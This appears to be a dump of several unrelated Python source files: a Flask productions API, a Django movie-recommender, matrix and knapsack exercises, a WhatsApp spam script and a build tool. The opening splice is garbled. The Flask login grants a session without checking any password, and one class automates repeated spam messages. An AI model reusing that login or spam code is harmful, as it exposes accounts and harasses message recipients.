if pos== 'right':\n group = '_' + tripep[1] + tripep[2]\n elif pos=='left':\n group = tripep[0] + tripep[1] + '_'\n elif pos=='middle':\n group = '_' + tripep[1] + '_'\n halftimes[tripep][1] = group\n\ndef group_by_range(halftimes, range=0.1):\n halftimes_tmp = halftimes.copy()\n # Mark tripeptides as unused for grouping\n for k in halftimes_tmp.keys():\n halftimes_tmp[k].append(0)\n group = 0\n for k in halftimes_tmp.keys():\n if halftimes_tmp[k][2]==1:\n continue # Continue if already grouped\n ht = halftimes_tmp[k][0]\n halftimes_tmp[k][1] = str(group)\n lower_limit = ht - (ht * range)\n upper_limit = ht + (ht * range)\n halftimes_tmp[k][2] = 1\n for l in halftimes_tmp.keys():\n if lower_limit<=halftimes_tmp[l][0]')\ndef index(id=0):\n return render_template(\"index.html\")\n\napi = Api(app)\nclass Productions(Resource):\n def get(self):\n production_list = [p.to_dict() for p in Production.query.all()]\n response = make_response(\n production_list,\n 200,\n )\n\n return response\n\n def post(self):\n form_json = request.get_json()\n new_production = Production(\n title=form_json['title'],\n genre=form_json['genre'],\n budget=int(form_json['budget']),\n image=form_json['image'],\n director=form_json['director'],\n description=form_json['description']\n )\n\n db.session.add(new_production)\n db.session.commit()\n\n response_dict = new_production.to_dict()\n\n response = make_response(\n response_dict,\n 201,\n )\n return 
response\napi.add_resource(Productions, '/productions')\n\n\nclass ProductionByID(Resource):\n    def get(self,id):\n        production = Production.query.filter_by(id=id).first()\n        if not production:\n            raise NotFound\n        production_dict = production.to_dict()\n        response = make_response(\n            production_dict,\n            200\n        )\n        \n        return response\n\n    def patch(self, id):\n        production = Production.query.filter_by(id=id).first()\n        if not production:\n            raise NotFound\n\n        for attr in request.form:\n            setattr(production, attr, request.form[attr])\n\n        production.ongoing = bool(request.form['ongoing'])\n        production.budget = int(request.form['budget'])\n\n        db.session.add(production)\n        db.session.commit()\n\n        production_dict = production.to_dict()\n        \n        response = make_response(\n            production_dict,\n            200\n        )\n        return response\n\n    def delete(self, id):\n        production = Production.query.filter_by(id=id).first()\n        if not production:\n            raise NotFound\n        db.session.delete(production)\n        db.session.commit()\n\n        response = make_response('', 204)\n        \n        return response\napi.add_resource(ProductionByID, '/productions/<int:id>')\n\nclass Signup(Resource):\n    def post(self):\n        \n        name = request.get_json()['name']\n        email = request.get_json()['email']\n        password = request.get_json()['password']\n\n        new_user = User(name=name, email=email, admin=False)\n        new_user.password_hash = password\n        db.session.add(new_user)\n        db.session.commit()\n\n        session['user_id'] = new_user.id\n        \n        return new_user.to_dict(), 201\n\napi.add_resource(Signup, '/signup', endpoint='signup')\n\n\nclass Login(Resource):\n\n    def post(self):\n        user = User.query.filter(User.name == request.get_json()['name']).first()\n        session['user_id'] = user.id\n        user_dict = user.to_dict()\n        response = make_response(\n            user_dict,\n            200,\n        )\n        return response\n\napi.add_resource(Login, '/login', endpoint='login')\n\nclass AuthorizedSession(Resource):\n    def get(self):\n\n        if session.get('user_id'):\n            \n            user = User.query.filter(User.id == session['user_id']).first()\n            \n            return user.to_dict(), 200\n        \n        else:\n            raise Unauthorized\n\n\napi.add_resource(AuthorizedSession, '/authorized', endpoint='authorized')\n\n\nclass Logout(Resource):\n    def delete(self):\n        session['user_id'] = None\n        response = make_response('',204,)\n        return response\n\napi.add_resource(Logout, '/logout', endpoint='logout')\n\n\n@app.errorhandler(NotFound)\ndef handle_not_found(e):\n    response = make_response(\n        \"Not Found: Sorry the resource you are looking for does not exist\",\n        404\n    )\n\n    return response\n\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)","repo_name":"ixnp/python_test","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42319199634","text":"#-*-coding:utf8-*-\n\nfrom pynput.keyboard import Key, Controller\nimport string\nfrom time import sleep\n\nclass Spam():\n\tdef __init__(self):\n\t\tself.keyboard = Controller()\n\t\n\tdef cambiar_de_ventana(self):\n\t\twith self.keyboard.pressed(Key.cmd):\n\t\t\tself.keyboard.press(Key.tab)\n\t\t\tself.keyboard.release(Key.tab)\n\t\t\n\t\tsleep(0.5)\n\n\tdef enviar_mensajes(self, texto, cantidad_de_veces):\n\t\tfor n in range(cantidad_de_veces):\n\t\t\tfor j in range(len(texto)):\n\t\t\t\tcaracter = texto[j]\n\t\t\t\tif caracter == ' ':\n\t\t\t\t\tself.keyboard.press(Key.space)\n\t\t\t\t\tself.keyboard.release(Key.space)\n\t\t\t\telif caracter in string.ascii_uppercase:\n\t\t\t\t\twith 
self.keyboard.pressed(Key.shift):\n\t\t\t\t\t\tcaracter = caracter.lower()\n\t\t\t\t\t\tself.keyboard.press(caracter)\n\t\t\t\t\t\tself.keyboard.release(caracter)\n\t\t\t\telse:\n\t\t\t\t\tself.keyboard.press(caracter)\n\t\t\t\t\tself.keyboard.release(caracter)\n\n\t\t\tself.keyboard.press(Key.enter)\n\t\t\tself.keyboard.release(Key.enter)\n\n# to uncomment, delete lines 38 and 49 -------------\n'''\nwhatsapp = Spam()\n# to switch to the previous window\nwhatsapp.cambiar_de_ventana()\n# to freeze the program for two seconds\n#sleep(2)\n\ntexto = 'enter your text here'\nN = # number of times to send\n\nwhatsapp.enviar_mensajes(texto, N)\n'''","repo_name":"luisalvaradoar/spam_whatsapp","sub_path":"class_spam.py","file_name":"class_spam.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37051676653","text":"#!/usr/bin/env python\n# @Time : 2019/3/30 11:37 \n__author__ = 'Boaz'\n\n# 0-100: find all the numbers divisible by 5\n\n\ndef getnum(min_,max_):\n    for i in range(min_,max_+1):\n        if i % 5 ==0:\n            yield i\n\n\nf = getnum(0, 100)\nprint(f)\nfor n in f:\n    print(n)","repo_name":"davidzhu1989/python-magic","sub_path":"Python-basic/生成器/mymethod2.py","file_name":"mymethod2.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759071856","text":"# Write a python program to compute following computation on matrix:\r\n# a) Addition of two matrices\r\n# b) Subtraction of two matrices\r\n# c) Multiplication of two matrices\r\n# d) Transpose of a matrix\r\n\r\n\r\nclass MatrixOperations:\r\n    def __init__(self, matrix, m, n):\r\n        self.matrix = matrix # this is the matrix created according to the order of the matrix\r\n        self.m = m # m is the number of rows\r\n        self.n = n # n is the number of columns\r\n\r\n    # for creating a matrix of dimensions m*n\r\n    def create_matrix(self):\r\n        self.matrix = []\r\n        for i in range(self.m):\r\n            self.matrix.append([])\r\n        for i in self.matrix:\r\n            for j in range(self.n):\r\n                i.append(0)\r\n        return self.matrix\r\n\r\n    # create matrix for transpose\r\n    def create_for_transpose(self):\r\n        self.matrix = []\r\n        for i in range(self.n):\r\n            self.matrix.append([])\r\n        for i in self.matrix:\r\n            for j in range(self.m):\r\n                i.append(0)\r\n        return self.matrix\r\n\r\n    # for creating matrix for multiplication\r\n    # create matrix of order m*l\r\n    def create_for_multiplication(self, m, l):\r\n        self.matrix = []\r\n        for i in range(m):\r\n            self.matrix.append([])\r\n        for i in self.matrix:\r\n            for j in range(l):\r\n                i.append(0)\r\n        return self.matrix\r\n\r\n    # for adding two matrices\r\n    def addition(self, matrix_1, matrix_2):\r\n        for i in range(0, self.m):\r\n            for j in range(0, self.n):\r\n                self.matrix[i][j] = matrix_1[i][j] + matrix_2[i][j]\r\n        return self.matrix\r\n\r\n    # for subtraction of two matrices\r\n    def subtraction(self, matrix_1, matrix_2):\r\n        for i in range(0, self.m):\r\n            for j in range(0, self.n):\r\n                self.matrix[i][j] = matrix_1[i][j] - matrix_2[i][j]\r\n        return self.matrix\r\n\r\n    # for transpose of a matrix\r\n    def transpose(self, matrix_1):\r\n        for i in range(0, self.m):\r\n            for j in range(0, self.n):\r\n                self.matrix[j][i] = matrix_1[i][j]\r\n        return self.matrix\r\n\r\n    def multiplication(self, matrix_1, matrix_2, m, n, l):\r\n        for i in range(m):\r\n            for j in range(l):\r\n                add = 0\r\n                for k in range(n):\r\n                    add = add + matrix_1[i][k]*matrix_2[k][j]\r\n                self.matrix[i][j] = 
add\r\n return self.matrix\r\n\r\n\r\ndef display_matrix(matrix):\r\n for i in matrix:\r\n for j in i:\r\n print(j, end=\" \")\r\n print(\"\")\r\n\r\n\r\ndef get_matrix(m):\r\n matrix = []\r\n for i in range(m):\r\n arr = list(map(int, input().split()))\r\n matrix.append(arr)\r\n return matrix\r\n\r\n\r\nmatrix_demo = []\r\nn = 0\r\nwhile n != 5:\r\n print(\"Choose an option:\")\r\n print(\"1.Addition\")\r\n print(\"2.Subtraction\")\r\n print(\"3.Transpose\")\r\n print(\"4.Multiplication\")\r\n print(\"5.Exit\")\r\n n = int(input())\r\n\r\n # addition\r\n if n == 1:\r\n # m and n should be same for both the matrices\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix 1 ---\")\r\n matrix_one = get_matrix(m)\r\n print(\"--- Matrix 2 ---\")\r\n matrix_two = get_matrix(m)\r\n\r\n obj_add = MatrixOperations(matrix_demo, m, n)\r\n obj_add.create_matrix() # for addition\r\n add_matrix = obj_add.addition(matrix_one, matrix_two)\r\n print(\"The addition of given matrices is: \")\r\n display_matrix(add_matrix)\r\n\r\n if n == 2:\r\n # m and n should be same for both the matrices\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix 1 ---\")\r\n matrix_one = get_matrix(m)\r\n print(\"--- Matrix 2 ---\")\r\n matrix_two = get_matrix(m)\r\n\r\n obj_sub = MatrixOperations(matrix_demo, m, n)\r\n obj_sub.create_matrix() # for subtraction\r\n sub_matrix = obj_sub.subtraction(matrix_one, matrix_two)\r\n print(\"The subtraction of given matrices is: \")\r\n display_matrix(sub_matrix)\r\n\r\n if n == 3:\r\n m = int(input(\"Enter the number of rows:\"))\r\n n = int(input(\"Enter the number of columns:\"))\r\n print(\"--- Matrix ---\")\r\n matrix = get_matrix(m)\r\n print(matrix)\r\n obj_trans = MatrixOperations(matrix_demo, m, n)\r\n obj_trans.create_for_transpose()\r\n transpose_mat = obj_trans.transpose(matrix)\r\n print(\"Transpose of the matrix is:\")\r\n display_matrix(transpose_mat)\r\n\r\n if n == 4:\r\n # m*n and n*p\r\n m = int(input(\"Enter number of rows:\"))\r\n n = int(input(\"Enter number of columns:\"))\r\n print('--- Matrix 1 ---')\r\n matrix_one = get_matrix(m)\r\n\r\n p = int(input(\"Enter number of columns:\"))\r\n print('--- Matrix 2 ---')\r\n matrix_two = get_matrix(n)\r\n\r\n obj_mul = MatrixOperations(matrix_demo, m, p)\r\n obj_mul.create_for_multiplication(m, p)\r\n multiplication = obj_mul.multiplication(matrix_one, matrix_two, m, n, p)\r\n print('The multiplication of given matrices is:')\r\n display_matrix(multiplication)\r\n\r\n if n == 5:\r\n print(\"Bye Bye\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"aabhapingle/Fundamentals-of-Data-Structures","sub_path":"assignment_03.py","file_name":"assignment_03.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33383412421","text":"\"\"\"\nN과 L이 주어질 때, 합이 N이면서, 길이가 적어도 L이면서 가장 짧은 연속된 음이 아닌 정수 리스트를\n구하는 프로그램을 작성하시오.\n\n만약 리스트의 길이가 100보다 작거나 같으면, 연속된 수를 첫째 줄에 공백으로 구분하여 출력한다. 
만약\n길이가 100보다 크거나 그러한 수열이 없을 때는 -1을 출력한다.\n\"\"\"\ndef gcd(a, b):\n return a if b == 0 else gcd(b, a % b)\n\n\ndef int_series(n, l):\n series = []\n if n % l == 0 and l % 2 == 1:\n series = [n // l] * l\n mid = len(series) // 2\n for i in range(1, mid+1):\n series[mid-i] -= i\n series[mid+i] += i\n elif l % 2 == 0 and l // gcd(n, l) == 2:\n series = [n / l] * l\n mid = len(series) // 2\n for i in range(mid):\n series[mid+i] += (i+0.5)\n series[mid-i-1] -= (0.5+i)\n series = [int(n) for n in series]\n return series if all(n >= 0 for n in series) else 0\n\n\nif __name__ == '__main__':\n n, l = (int(n) for n in input().split())\n exists = False\n\n\n while l <= 100:\n series = int_series(n, l)\n if series:\n exists = True\n break\n else:\n l += 1\n\n\n if exists:\n answer = ''\n for n in series:\n answer += str(n) + ' '\n print(answer.rstrip())\n else:\n print(-1)\n","repo_name":"shoark7/algorithm-with-python","sub_path":"etc_examples/baekjoon/_01024_series_int.py","file_name":"_01024_series_int.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"ko","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"13913109093","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom api.models import Movie, Rate, Cluster, Profile,Movie_Cluster_Kmeans, Movie_Cluster_Hmeans, Movie_Cluster_EM\nfrom api.serializers import MovieSerializer, Movie_Age_Serializer, Movie_Genre_Serializer\nfrom rest_framework.response import Response\nfrom django.db.models import Avg\nimport pandas as pd\nimport random, pprint\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef movies(request):\n if request.method == 'GET':\n id = request.GET.get('id', request.GET.get('movie_id', None))\n title = request.GET.get('title', None)\n movies = Movie.objects.all()\n \n if id:\n movies = movies.filter(pk=id)\n if title:\n movies = movies.filter(title__icontains=title)\n \n num = request.GET.get('num', None)\n canmore = True\n if len(movies) >= 12:\n if num:\n num = int(num)\n movies = movies[num*12:(num+1)*12]\n if len(movies) < 12:\n canmore = False\n else:\n movies = movies[:12]\n else:\n canmore = False\n serializer = MovieSerializer(movies, many=True)\n return Response(data=[serializer.data, canmore], status=status.HTTP_200_OK)\n\n if request.method == 'DELETE':\n movie = Movie.objects.all()\n movie.delete()\n return Response(status=status.HTTP_200_OK)\n\n if request.method == 'POST':\n movies = request.data.get('movies', None)\n for movie in movies:\n id = movie.get('id', None)\n title = movie.get('title', None)\n genres = movie.get('genres', None)\n\n if not (id and title and genres):\n continue\n if Movie.objects.filter(id=id).count() > 0 or Movie.objects.filter(title=title).count() > 0:\n continue\n\n Movie(id=id, title=title, genres='|'.join(genres)).save()\n\n return Response(status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef homepage(request):\n\n movies = Movie.objects.all().order_by('-watch_count')[:10]\n\n serializer = MovieSerializer(movies, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef genres(request):\n id = request.GET.get('id', request.GET.get('movie_id', None))\n title = request.GET.get('title', None)\n genre = request.GET.get('genre', None)\n watch_count = request.GET.get('watch_count', None)\n movies = Movie.objects.all().order_by('-watch_count')\n\n if id:\n movies = movies.filter(pk=id)\n if title:\n movies = 
movies.filter(title__icontains=title)\n if genre:\n movies = movies.filter(genres__icontains=genre)\n serializer = Movie_Genre_Serializer(movies, many=True)\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef ages(request):\n age = request.GET.get('age', None)\n\n if age == \"\":\n print('여기떳다아아')\n age_index=\"\"\n elif age == 'Under 18':\n age_index = 1\n elif age == \"18-24\":\n age_index = 18\n elif age == \"25-34\":\n age_index = 25\n elif age == \"35-44\":\n age_index = 35\n elif age == \"45-49\":\n age_index = 45\n elif age == \"50-55\":\n age_index = 50\n else:\n age_index = 56\n\n if age_index:\n profiles = Profile.objects.filter(age=age_index)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef occupations(request):\n occupation = request.GET.get('occupation', None)\n\n if occupation:\n profiles = Profile.objects.filter(occupation=occupation)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef genders(request):\n gender = request.GET.get('gender', None)\n\n if gender:\n profiles = Profile.objects.filter(gender=gender)\n else:\n profiles = Profile.objects.all()\n rates = Rate.objects.filter(UserID__in=profiles)\n rates = rates.values('MovieID', 'MovieID__title', 'MovieID__genres', 'MovieID__watch_count', 'MovieID__plot', 'MovieID__url', 'MovieID__director', 'MovieID__casting').annotate(Avg('rating'))\n rates = rates.order_by('-MovieID__watch_count')\n serializer = Movie_Age_Serializer(rates, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef detail(request, movie_id):\n movie = Movie.objects.get(pk=movie_id)\n movie.watch_count += 1\n movie.save()\n cluster = Cluster.objects.get(pk=1)\n result = []\n serializer = MovieSerializer(movie)\n result.append(serializer.data)\n\n # H clustering\n if cluster.way == 'H':\n getMovie = Movie_Cluster_Hmeans.objects.get(MovieId=movie.id)\n if cluster.n_component == 3:\n lists = Movie_Cluster_Hmeans.objects.filter(H3=getMovie.H3)\n elif cluster.n_component == 4:\n lists = Movie_Cluster_Hmeans.objects.filter(H4=getMovie.H4)\n elif cluster.n_component == 5:\n lists = Movie_Cluster_Hmeans.objects.filter(H5=getMovie.H5)\n elif cluster.n_component == 6:\n lists = Movie_Cluster_Hmeans.objects.filter(H6=getMovie.H6)\n elif cluster.n_component == 7:\n lists = Movie_Cluster_Hmeans.objects.filter(H7=getMovie.H7)\n\n # Kmeans clustering\n if cluster.way == 'K':\n getMovie = Movie_Cluster_Kmeans.objects.get(MovieId=movie.id)\n if cluster.n_component == 3:\n lists = Movie_Cluster_Kmeans.objects.filter(K3=getMovie.K3)\n elif 
cluster.n_component == 4:\n            lists = Movie_Cluster_Kmeans.objects.filter(K4=getMovie.K4)\n        elif cluster.n_component == 5:\n            lists = Movie_Cluster_Kmeans.objects.filter(K5=getMovie.K5)\n        elif cluster.n_component == 6:\n            lists = Movie_Cluster_Kmeans.objects.filter(K6=getMovie.K6)\n        elif cluster.n_component == 7:\n            lists = Movie_Cluster_Kmeans.objects.filter(K7=getMovie.K7)\n\n    # EM clustering\n    if cluster.way == 'EM':\n        getMovie = Movie_Cluster_EM.objects.get(MovieId=movie.id)\n        if cluster.n_component == 3:\n            lists = Movie_Cluster_EM.objects.filter(EM3=getMovie.EM3)\n        elif cluster.n_component == 4:\n            lists = Movie_Cluster_EM.objects.filter(EM4=getMovie.EM4)\n        elif cluster.n_component == 5:\n            lists = Movie_Cluster_EM.objects.filter(EM5=getMovie.EM5)\n        elif cluster.n_component == 6:\n            lists = Movie_Cluster_EM.objects.filter(EM6=getMovie.EM6)\n        elif cluster.n_component == 7:\n            lists = Movie_Cluster_EM.objects.filter(EM7=getMovie.EM7)\n\n    tmp = random.sample(list(lists), 5)\n    for t in tmp:\n        movie = Movie.objects.get(title=t.MovieId)\n        serializer = MovieSerializer(movie)\n        result.append(serializer.data)\n    return Response(data=result, status=status.HTTP_200_OK)\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef getarray(request):\n\n    array = []\n\n    genre_number = {'Action':0,'Adventure':1,'Animation':2,\"Children's\":3,'Comedy':4,'Crime':5,'Documentary':6,\n                    'Drama':7,'Fantasy':8,'Film-Noir':9, 'Horror':10, 'Musical':11, 'Mystery':12,\n                    'Romance':13,'Sci-Fi':14,'Thriller':15,'War':16,'Western':17}\n\n    movies = Movie.objects.all()\n    movies_count = len(movies)\n\n    for i in range(movies_count):\n        tmp_array = [0]*19\n\n        movie_genres = movies[i].genres.split('|')\n        tmp_array[18] = movies[i].pk\n\n        for j in range(len(movie_genres)):\n            tmp_array[genre_number[movie_genres[j]]] = 1\n\n        array.append(tmp_array)\n\n    df = pd.DataFrame(array)\n    df.to_csv(\"answer.csv\", header=None, index=None)\n\n    return Response(status=status.HTTP_200_OK)\n\n@api_view(['GET'])\ndef getrate(request, movie_id, profile_id):\n    profile = Profile.objects.get(pk=profile_id)\n    movie = Movie.objects.get(pk=movie_id)\n    rate = Rate.objects.filter(UserID=profile, MovieID=movie)\n\n    if rate:\n        result = {'flag':True, 'rate':rate[0].rating}\n    else:\n        result = {'flag':False}\n\n    return Response(data=result, status=status.HTTP_200_OK)\n","repo_name":"frtt0608/movieJoa","sub_path":"Backend_Django/api/views/movie_views.py","file_name":"movie_views.py","file_ext":"py","file_size_in_byte":9077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"877092029","text":"# Uses python3\nimport sys\n\nimport numpy as np\n\ndef get_optimal_value(capacity, weights, values):\n    value = 0.0\n    weights = np.array(weights)\n    values = np.array(values)\n    # item indices sorted by value per unit of weight, best first\n    per_unit_val = (values/weights).argsort()[::-1]\n\n    for i in per_unit_val:\n        if capacity == 0:\n            break\n        weight_increment = min(capacity, weights[i])\n        capacity -= weight_increment\n        value += (values[i]/weights[i])*weight_increment\n\n    return value\n\n\nif __name__ == \"__main__\":\n    data = list(map(int, sys.stdin.read().split()))\n    n, capacity = data[0:2]\n    values = data[2:(2 * n + 2):2]\n    weights = data[3:(2 * n + 2):2]\n    opt_value = get_optimal_value(capacity, weights, values)\n    
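# print the greedy fractional-knapsack optimum with 10-decimal precision\n    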
print(\"{:.10f}\".format(opt_value))\n","repo_name":"Samarth2506/Learning","sub_path":"Data_Structures_Algorithms/Algorithmic_Toolbox_Coursera/week3_greedy_algorithms/2_maximum_value_of_the_loot/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73179626728","text":"import argparse\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nfrom pyro.Enums.Event import (BuildEvent,\r\n ImportEvent,\r\n CompileEvent,\r\n AnonymizeEvent,\r\n PackageEvent,\r\n ZipEvent)\r\nfrom pyro.BuildFacade import BuildFacade\r\nfrom pyro.Comparators import startswith\r\nfrom pyro.PapyrusProject import PapyrusProject\r\nfrom pyro.PathHelper import PathHelper\r\nfrom pyro.PexReader import PexReader\r\nfrom pyro.ProjectOptions import ProjectOptions\r\n\r\n\r\nclass Application:\r\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(asctime)s [%(levelname).4s] %(message)s')\r\n log = logging.getLogger('pyro')\r\n\r\n args: argparse.Namespace = None\r\n\r\n def __init__(self, parser: argparse.ArgumentParser) -> None:\r\n self.parser = parser\r\n\r\n self.args = self.parser.parse_args()\r\n\r\n if self.args.show_help:\r\n self.parser.print_help()\r\n sys.exit(1)\r\n\r\n # set up log levels\r\n log_level_argv = self.args.log_level.upper()\r\n log_level = getattr(logging, log_level_argv, logging.DEBUG)\r\n self.log.setLevel(log_level)\r\n\r\n Application.log.debug(f'Set log level to: {log_level_argv}')\r\n\r\n self.args.input_path = self._try_fix_input_path(self.args.input_path or self.args.input_path_deprecated)\r\n\r\n if not self.args.create_project and not os.path.isfile(self.args.input_path):\r\n Application.log.error(f'Cannot load nonexistent PPJ at given path: \"{self.args.input_path}\"')\r\n sys.exit(1)\r\n\r\n @staticmethod\r\n def _try_fix_input_path(input_path: str) -> str:\r\n if not input_path:\r\n Application.log.error('required argument missing: -i INPUT.ppj')\r\n sys.exit(1)\r\n\r\n if startswith(input_path, 'file:', ignorecase=True):\r\n full_path = PathHelper.url2pathname(input_path)\r\n input_path = os.path.normpath(full_path)\r\n\r\n if not os.path.isabs(input_path):\r\n cwd = os.getcwd()\r\n Application.log.info(f'Using working directory: \"{cwd}\"')\r\n\r\n input_path = os.path.join(cwd, input_path)\r\n\r\n Application.log.info(f'Using input path: \"{input_path}\"')\r\n\r\n return input_path\r\n\r\n @staticmethod\r\n def _validate_project_file(ppj: PapyrusProject) -> None:\r\n if ppj.imports_node is None and \\\r\n (ppj.scripts_node is not None or ppj.folders_node is not None):\r\n Application.log.error('Cannot proceed without imports defined in project')\r\n sys.exit(1)\r\n\r\n if ppj.options.package and ppj.packages_node is None:\r\n Application.log.error('Cannot proceed with Package enabled without Packages defined in project')\r\n sys.exit(1)\r\n\r\n if ppj.options.zip and ppj.zip_files_node is None:\r\n Application.log.error('Cannot proceed with Zip enabled without ZipFile defined in project')\r\n sys.exit(1)\r\n\r\n @staticmethod\r\n def _validate_project_paths(ppj: PapyrusProject) -> None:\r\n compiler_path = ppj.get_compiler_path()\r\n if not compiler_path or not os.path.isfile(compiler_path):\r\n Application.log.error('Cannot proceed without compiler path')\r\n sys.exit(1)\r\n\r\n flags_path = ppj.get_flags_path()\r\n if not flags_path:\r\n Application.log.error('Cannot proceed without flags path')\r\n 
sys.exit(1)\r\n\r\n if not ppj.options.game_type:\r\n Application.log.error('Cannot determine game type from arguments or Papyrus Project')\r\n sys.exit(1)\r\n\r\n if not os.path.isabs(flags_path) and \\\r\n not any([os.path.isfile(os.path.join(import_path, flags_path)) for import_path in ppj.import_paths]):\r\n Application.log.error('Cannot proceed without flags file in any import folder')\r\n sys.exit(1)\r\n\r\n def run(self) -> int:\r\n \"\"\"\r\n Entry point\r\n \"\"\"\r\n _, extension = os.path.splitext(os.path.basename(self.args.input_path).casefold())\r\n\r\n if extension == '.pex':\r\n header = PexReader.dump(self.args.input_path)\r\n Application.log.info(f'Dumping: \"{self.args.input_path}\"\\n{header}')\r\n sys.exit(0)\r\n elif extension not in ('.ppj', '.pyroproject'):\r\n Application.log.error('Cannot proceed without PPJ file path')\r\n sys.exit(1)\r\n\r\n options = ProjectOptions(self.args.__dict__)\r\n ppj = PapyrusProject(options)\r\n\r\n self._validate_project_file(ppj)\r\n\r\n if ppj.scripts_node is not None or ppj.folders_node is not None or ppj.remote_paths:\r\n ppj.try_initialize_remotes()\r\n\r\n if ppj.use_pre_import_event:\r\n ppj.try_run_event(ImportEvent.PRE)\r\n\r\n ppj.try_populate_imports()\r\n\r\n if ppj.use_post_import_event:\r\n ppj.try_run_event(ImportEvent.POST)\r\n\r\n ppj.try_set_game_type()\r\n ppj.find_missing_scripts()\r\n ppj.try_set_game_path()\r\n\r\n self._validate_project_paths(ppj)\r\n\r\n Application.log.info('Imports found:')\r\n for path in ppj.import_paths:\r\n Application.log.info(f'+ \"{path}\"')\r\n\r\n Application.log.info('Scripts found:')\r\n for _, path in ppj.psc_paths.items():\r\n Application.log.info(f'+ \"{path}\"')\r\n\r\n build = BuildFacade(ppj)\r\n\r\n # bsarch path is not set until BuildFacade initializes\r\n if ppj.options.package and not os.path.isfile(ppj.options.bsarch_path):\r\n Application.log.error('Cannot proceed with Package enabled without valid BSArch path')\r\n sys.exit(1)\r\n\r\n if ppj.use_pre_build_event:\r\n ppj.try_run_event(BuildEvent.PRE)\r\n\r\n if build.scripts_count > 0:\r\n if ppj.use_pre_compile_event:\r\n ppj.try_run_event(CompileEvent.PRE)\r\n\r\n build.try_compile()\r\n\r\n if ppj.use_post_compile_event:\r\n ppj.try_run_event(CompileEvent.POST)\r\n\r\n if ppj.options.anonymize:\r\n if build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_anonymize_event:\r\n ppj.try_run_event(AnonymizeEvent.PRE)\r\n\r\n build.try_anonymize()\r\n\r\n if ppj.use_post_anonymize_event:\r\n ppj.try_run_event(AnonymizeEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot anonymize scripts because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n else:\r\n Application.log.info('Cannot anonymize scripts because Anonymize is disabled in project')\r\n\r\n if ppj.options.package:\r\n if build.get_compile_data().failed_count == 0 or ppj.options.ignore_errors:\r\n if ppj.use_pre_package_event:\r\n ppj.try_run_event(PackageEvent.PRE)\r\n\r\n build.try_pack()\r\n\r\n if ppj.use_post_package_event:\r\n ppj.try_run_event(PackageEvent.POST)\r\n else:\r\n Application.log.error(f'Cannot create Packages because {build.get_compile_data().failed_count} scripts failed to compile')\r\n sys.exit(build.get_compile_data().failed_count)\r\n elif ppj.packages_node is not None:\r\n Application.log.info('Cannot create Packages because Package is disabled in project')\r\n\r\n if ppj.options.zip:\r\n if 
